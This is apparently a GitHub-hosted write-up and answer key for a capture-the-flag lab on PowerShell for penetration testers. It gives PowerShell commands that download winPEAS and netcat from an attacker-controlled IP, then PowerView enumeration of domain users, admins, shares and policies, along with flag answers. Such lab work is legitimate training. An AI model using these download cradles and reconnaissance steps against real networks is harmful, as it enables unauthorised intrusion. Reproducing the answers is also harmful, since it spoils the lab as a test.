-
Notifications
You must be signed in to change notification settings - Fork 0
/
PowerShell for Pentesters
101 lines (73 loc) · 3.1 KB
/
PowerShell for Pentesters
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
Những ai tìm được bình yên ở quá khứ...
You've got to make peace with the past if you...
sẽ có hi vọng ở tương lai.
...if you want hope for the future.
#Task 2 Manipulating files
What is the MD5 hash value of the file on Walter's desktop?
hint: Get-FileHash -Algorithm MD5 .\powerview.ps1
501570FFBA7FACE69D61DA1A0843E89A
#Task 3 Downloading files
(New-Object System.Net.WebClient).DownloadFile('http://10.6.88.227:8000/winPEASx64.exe', 'wi
nPEASx64.exe')
Invoke-WebRequest "http://10.6.88.227:8000/nc.exe" -OutFile "netcat.exe"
#Task 4 System Reconnaissance
- What Windows Security Update was installed on 5/15/2019?
PS C:\Users\Walter\Desktop> Get-HotFix| findstr 5/15
WATCHMAN-DC Security Update KB4499728 NT AUTHORITY\SYSTEM 5/15/2019 12:00:00 AM
KB4499728
#Task 5 Network Reconnaissance
no answer
#Task 6 Using PowerView
- One of the accounts has a special description; what is it?
hint: Get-NetUser -Properties description
IDF-17828290
- How many accounts are disabled?
hint: Get-NetUser -Properties useraccountcontrol
Get-NetUser -Properties useraccountcontrol | findstr ACCOUNTDISABLE
Get-NetUser -Properties useraccountcontrol | findstr ACCOUNTDISABLE | measure
- How many users are in the "domain admins" group?
hint: Get-NetGroupMember "domain admins"
or Get-NetGroupMember "domain admins" | findstr MemberName
or Get-NetGroupMember "domain admins" | measure
Count : 3
Average :
Sum :
Maximum :
Minimum :
Property :
3
- Which users are in the "domain admins" group? (Listed alphabetically, small, comma-separated, using space)
hint: Get-NetGroupMember "domain admins"| Sort-Object membername|Format-Table membername
MemberName
----------
ServerAdmin
ssilk
usand
ServerAdmin,ssilk,usand
- List shares; what is the name of the "interesting" share?
hint: Find-DomainShare
or Find-DomainShare -CheckShareAccess
Name Type Remark ComputerName
---- ---- ------ ------------
ADMIN$ 2147483648 Remote Admin WATCHMAN-DC.WATCH.local
C$ 2147483648 Default share WATCHMAN-DC.WATCH.local
NETLOGON 0 Logon server share WATCHMAN-DC.WATCH.local
operationfiles 0 WATCHMAN-DC.WATCH.local
SYSVOL 0 Logon server share WATCHMAN-DC.WATCH.local
Get-NetGPO | findstr displayname
displayname : Default Domain Policy
displayname : Default Domain Controllers Policy
displayname : Disable WinDef
or PS C:\Users\Walter\Desktop> Get-NetGPO -Properties displayname
displayname
-----------
Default Domain Policy
Default Domain Controllers Policy
Disable WinDef
- What are the first names of users' whose accounts were disabled? (Sorted alphabetically, small, comma-separated, using space)
hint: Get-NetUser | Sort-Object displayname | Where-Object -Property useraccountcontrol -Match ACCOUNTDISABLE | Format-Table displayname
Daniel Triberg
Ursula Sand
Daniel, Ursula
https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview
https://hamdisevben.medium.com/tryhackme-powershell-for-pentesters-b31a3036ec2